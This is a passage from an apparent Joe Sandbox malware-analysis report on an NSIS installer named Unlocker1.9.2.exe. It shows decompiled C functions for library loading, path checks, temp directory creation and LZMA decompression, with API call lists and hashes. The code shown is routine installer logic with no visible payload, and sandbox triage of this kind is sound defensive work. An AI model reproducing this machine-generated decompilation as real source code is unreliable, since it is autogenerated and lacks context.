				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x423f38");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x423f08 =  *0x423f08 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E004029F6(0xfffffff0);
				 *(_t34 + 8) = E004029F6(1);
				if( *((intOrPtr*)(_t34 - 0x14)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E00404D7B(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x1c)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 0x34)), 0x400, 0x424000, 0x40af50, 0x409000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x1c)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x18)) == _t27 && E004034C6(_t30) != 0) {
						FreeLibrary(_t30); // executed
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                                                                                                                                                              0x00401f51
                                                                                                                                                              0x00401f51
                                                                                                                                                              0x00401f56
                                                                                                                                                              0x00401f5d
                                                                                                                                                              0x00402019
                                                                                                                                                              0x00402164
                                                                                                                                                              0x00402164
                                                                                                                                                              0x0040288b
                                                                                                                                                              0x0040288e
                                                                                                                                                              0x0040289a
                                                                                                                                                              0x0040289a
                                                                                                                                                              0x00401f6c
                                                                                                                                                              0x00401f76
                                                                                                                                                              0x00401f79
                                                                                                                                                              0x00401f88
                                                                                                                                                              0x00401f8c
                                                                                                                                                              0x00401f92
                                                                                                                                                              0x00401f96
                                                                                                                                                              0x00402012
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00402012
                                                                                                                                                              0x00401f98
                                                                                                                                                              0x00401fa2
                                                                                                                                                              0x00401fa6
                                                                                                                                                              0x00401fea
                                                                                                                                                              0x00401fa8
                                                                                                                                                              0x00401fab
                                                                                                                                                              0x00401fae
                                                                                                                                                              0x00401fde
                                                                                                                                                              0x00401fb0
                                                                                                                                                              0x00401fb3
                                                                                                                                                              0x00401fbc
                                                                                                                                                              0x00401fbe
                                                                                                                                                              0x00401fbe
                                                                                                                                                              0x00401fbc
                                                                                                                                                              0x00401fae
                                                                                                                                                              0x00401ff2
                                                                                                                                                              0x00402007
                                                                                                                                                              0x00402007
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00401ff2
                                                                                                                                                              0x00401f7c
                                                                                                                                                              0x00401f82
                                                                                                                                                              0x00401f86
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401F7C
                                                                                                                                                                • Part of subcall function 00404D7B: lstrlenA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\,00000000,007D06EE,00000000,?,?,?,?,?,?,?,?,?,00402F8B,00000000,?), ref: 00404DB4
                                                                                                                                                                • Part of subcall function 00404D7B: lstrlenA.KERNEL32(00402F8B,Remove folder: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\,00000000,007D06EE,00000000,?,?,?,?,?,?,?,?,?,00402F8B,00000000), ref: 00404DC4
                                                                                                                                                                • Part of subcall function 00404D7B: lstrcatA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\,00402F8B,00402F8B,Remove folder: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\,00000000,007D06EE,00000000), ref: 00404DD7
                                                                                                                                                                • Part of subcall function 00404D7B: SetWindowTextA.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\), ref: 00404DE9
                                                                                                                                                                • Part of subcall function 00404D7B: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404E0F
                                                                                                                                                                • Part of subcall function 00404D7B: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E29
                                                                                                                                                                • Part of subcall function 00404D7B: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E37
                                                                                                                                                              • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401F8C
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00401F9C
                                                                                                                                                              • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402007
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2987980305-0
                                                                                                                                                              • Opcode ID: 71306b1134231061c89694e0e173e72c12ff72d2ee8c3f8387a1942ab3f7262f
                                                                                                                                                              • Instruction ID: d4347cebb671b603d0a5d412fc90ce50d757f993dc699470b494ace3858b78d6
                                                                                                                                                              • Opcode Fuzzy Hash: 71306b1134231061c89694e0e173e72c12ff72d2ee8c3f8387a1942ab3f7262f
                                                                                                                                                              • Instruction Fuzzy Hash: 7221EE72D04216ABCF107FA4DE89A6E75B06B44359F204337F611B52E0D77C4941965E
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00404CCB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00404CCB(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t13;
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x420460 != _t22) {
							 *0x420460 = _t22;
							E004059DD(0x420478, 0x424000);
							E0040593B(0x424000, _t22);
							E0040140B(6);
							E004059DD(0x424000, 0x420478);
						}
						L11:
						_t13 = CallWindowProcA( *0x420468, _a4, _a8, _a12, _t22); // executed
						return _t13;
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E0040464A(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403DDB(0x413);
				return 0;
			}





                                                                                                                                                              0x00404cd7
                                                                                                                                                              0x00404cfc
                                                                                                                                                              0x00404d1c
                                                                                                                                                              0x00404d1f
                                                                                                                                                              0x00404d22
                                                                                                                                                              0x00404d39
                                                                                                                                                              0x00404d3f
                                                                                                                                                              0x00404d46
                                                                                                                                                              0x00404d4d
                                                                                                                                                              0x00404d54
                                                                                                                                                              0x00404d59
                                                                                                                                                              0x00404d5f
                                                                                                                                                              0x00404d6f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00404d6f
                                                                                                                                                              0x00404d09
                                                                                                                                                              0x00404d5c
                                                                                                                                                              0x00404d5c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00404d5c
                                                                                                                                                              0x00404d15
                                                                                                                                                              0x00404d17
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00404d17
                                                                                                                                                              0x00404cdd
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00404ce4
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • IsWindowVisible.USER32(?), ref: 00404D01
                                                                                                                                                              • CallWindowProcA.USER32 ref: 00404D6F
                                                                                                                                                                • Part of subcall function 00403DDB: SendMessageA.USER32(0014005A,00000000,00000000,00000000), ref: 00403DED
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3748168415-3916222277
                                                                                                                                                              • Opcode ID: 7ef91977e0255b1fc34b6530065b048aeb6426da5fc65d298478046c2303bded
                                                                                                                                                              • Instruction ID: 2250b5ae86c5db7695da18b81197a994f129f58ca555af08ca8730d1192fac1c
                                                                                                                                                              • Opcode Fuzzy Hash: 7ef91977e0255b1fc34b6530065b048aeb6426da5fc65d298478046c2303bded
                                                                                                                                                              • Instruction Fuzzy Hash: 5A118CB1600208BBDF217F629C4099B3B69EF84765F00813BFB14392A2C77C8951CFA9
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004055B1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 53%
                                                                                                                                                              			E004055B1(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				long _t16;
				intOrPtr _t18;
				intOrPtr* _t21;
				void* _t22;

				E004059DD(0x421880, _a4);
				_t21 = E00405564(0x421880);
				if(_t21 != 0) {
					E00405C3F(_t21);
					if(( *0x423e98 & 0x00000080) == 0) {
						L5:
						_t22 = _t21 - 0x421880;
						while(1) {
							_t11 = lstrlenA(0x421880);
							_push(0x421880);
							if(_t11 <= _t22) {
								break;
							}
							_t12 = E00405CD8();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405517(0x421880);
								continue;
							} else {
								goto L1;
							}
						}
						E004054D0();
						_t16 = GetFileAttributesA(??); // executed
						return 0 | _t16 != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}









                                                                                                                                                              0x004055bd
                                                                                                                                                              0x004055c8
                                                                                                                                                              0x004055cc
                                                                                                                                                              0x004055d3
                                                                                                                                                              0x004055df
                                                                                                                                                              0x004055eb
                                                                                                                                                              0x004055eb
                                                                                                                                                              0x00405603
                                                                                                                                                              0x00405604
                                                                                                                                                              0x0040560b
                                                                                                                                                              0x0040560c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004055ef
                                                                                                                                                              0x004055f6
                                                                                                                                                              0x004055fe
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004055f6
                                                                                                                                                              0x0040560e
                                                                                                                                                              0x00405614
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405622
                                                                                                                                                              0x004055e1
                                                                                                                                                              0x004055e5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004055e5
                                                                                                                                                              0x004055ce
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 004059DD: lstrcpynA.KERNEL32(?,?,00000400,00403139,Unlocker 1.9.2 Setup,NSIS Error), ref: 004059EA
                                                                                                                                                                • Part of subcall function 00405564: CharNextA.USER32(00405316,?,C:\,00000000,004055C8,C:\,C:\,?,?,00000000,00405316,?,"C:\Users\user\Desktop\Unlocker1.9.2.exe",00000000), ref: 00405572
                                                                                                                                                                • Part of subcall function 00405564: CharNextA.USER32(00000000), ref: 00405577
                                                                                                                                                                • Part of subcall function 00405564: CharNextA.USER32(00000000), ref: 00405586
                                                                                                                                                              • lstrlenA.KERNEL32(C:\,00000000,C:\,C:\,?,?,00000000,00405316,?,"C:\Users\user\Desktop\Unlocker1.9.2.exe",00000000), ref: 00405604
                                                                                                                                                              • GetFileAttributesA.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,?,?,00000000,00405316,?,"C:\Users\user\Desktop\Unlocker1.9.2.exe",00000000), ref: 00405614
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                              • String ID: C:\
                                                                                                                                                              • API String ID: 3248276644-3404278061
                                                                                                                                                              • Opcode ID: 658a5dec63a6dfd38c94e6fe1a96680d2d49e1cb79ea5bcfe5db1de8d6a58f0a
                                                                                                                                                              • Instruction ID: 3cda5072feefcb47a16d69abed3bdaa5828b8ced6428ee97c76234aedc7658ab
                                                                                                                                                              • Opcode Fuzzy Hash: 658a5dec63a6dfd38c94e6fe1a96680d2d49e1cb79ea5bcfe5db1de8d6a58f0a
                                                                                                                                                              • Instruction Fuzzy Hash: C2F02831104E903AC723223A1C06A9F1A96CE86369B58053FF855B12D5DA3C8943DD7E
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00403097 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 84%
                                                                                                                                                              			E00403097(void* __eflags) {
				void* _t2;
				void* _t5;
				CHAR* _t6;

				_t6 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
				E00405C3F(_t6);
				_t2 = E0040553D(_t6);
				if(_t2 != 0) {
					E004054D0(_t6);
					CreateDirectoryA(_t6, 0); // executed
					_t5 = E004056E3("1033", _t6); // executed
					return _t5;
				} else {
					return _t2;
				}
			}






                                                                                                                                                              0x00403098
                                                                                                                                                              0x0040309e
                                                                                                                                                              0x004030a4
                                                                                                                                                              0x004030ab
                                                                                                                                                              0x004030b0
                                                                                                                                                              0x004030b8
                                                                                                                                                              0x004030c4
                                                                                                                                                              0x004030ca
                                                                                                                                                              0x004030ae
                                                                                                                                                              0x004030ae
                                                                                                                                                              0x004030ae

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00405C3F: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Unlocker1.9.2.exe",C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405C97
                                                                                                                                                                • Part of subcall function 00405C3F: CharNextA.USER32(?,?,?,00000000), ref: 00405CA4
                                                                                                                                                                • Part of subcall function 00405C3F: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Unlocker1.9.2.exe",C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405CA9
                                                                                                                                                                • Part of subcall function 00405C3F: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\Unlocker1.9.2.exe",C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405CB9
                                                                                                                                                              • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 004030B8
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                                              • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                              • API String ID: 4115351271-517883005
                                                                                                                                                              • Opcode ID: 6fc6148b77ece9d346d6d7cc43375dab10df03dac4f70bfb46dffa123947e942
                                                                                                                                                              • Instruction ID: 14cf73edb083f9294524d0cb591bdba299ebaa8e37fda96f2dae1f3ab35ccfa6
                                                                                                                                                              • Opcode Fuzzy Hash: 6fc6148b77ece9d346d6d7cc43375dab10df03dac4f70bfb46dffa123947e942
                                                                                                                                                              • Instruction Fuzzy Hash: 95D0C92160BD3032D66136263D0AFDF155C8F5236EFA1447BF809B61CA5B6C6A8219FF
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00403491 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00403491() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x41f434; // 0x0
				_t3 = E00403476(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8)); // executed
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x41f434 =  *0x41f434 & 0x00000000;
				return _t3;
			}







                                                                                                                                                              0x00403492
                                                                                                                                                              0x0040349a
                                                                                                                                                              0x004034a1
                                                                                                                                                              0x004034a4
                                                                                                                                                              0x004034a4
                                                                                                                                                              0x004034a6
                                                                                                                                                              0x004034ab
                                                                                                                                                              0x004034b2
                                                                                                                                                              0x004034b8
                                                                                                                                                              0x004034bc
                                                                                                                                                              0x004034bd
                                                                                                                                                              0x004034c5

                                                                                                                                                              APIs
                                                                                                                                                              • FreeLibrary.KERNELBASE(?,"C:\Users\user\Desktop\Unlocker1.9.2.exe",00000000,00000000,00403469,004032BC,00000000), ref: 004034AB
                                                                                                                                                              • GlobalFree.KERNEL32 ref: 004034B2
                                                                                                                                                              Strings
                                                                                                                                                              • "C:\Users\user\Desktop\Unlocker1.9.2.exe", xrefs: 004034A3
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Free$GlobalLibrary
                                                                                                                                                              • String ID: "C:\Users\user\Desktop\Unlocker1.9.2.exe"
                                                                                                                                                              • API String ID: 1100898210-3781551375
                                                                                                                                                              • Opcode ID: 3e2f1a94e1730b0e2f77525ddf4d06804517b8e77a23c02aa7cd98468957b701
                                                                                                                                                              • Instruction ID: 7bfc0464e02b508f879d35a29cae48101a6ab00b4f5f00e512934bdeb57274a8
                                                                                                                                                              • Opcode Fuzzy Hash: 3e2f1a94e1730b0e2f77525ddf4d06804517b8e77a23c02aa7cd98468957b701
                                                                                                                                                              • Instruction Fuzzy Hash: FBE08C3280653097C7221F05AE04B9AB66C6F94B22F068076E8407B3A1C3782C428AD8
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004063DD Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 99%
                                                                                                                                                              			E004063DD() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M0040684B))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4)); // executed
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
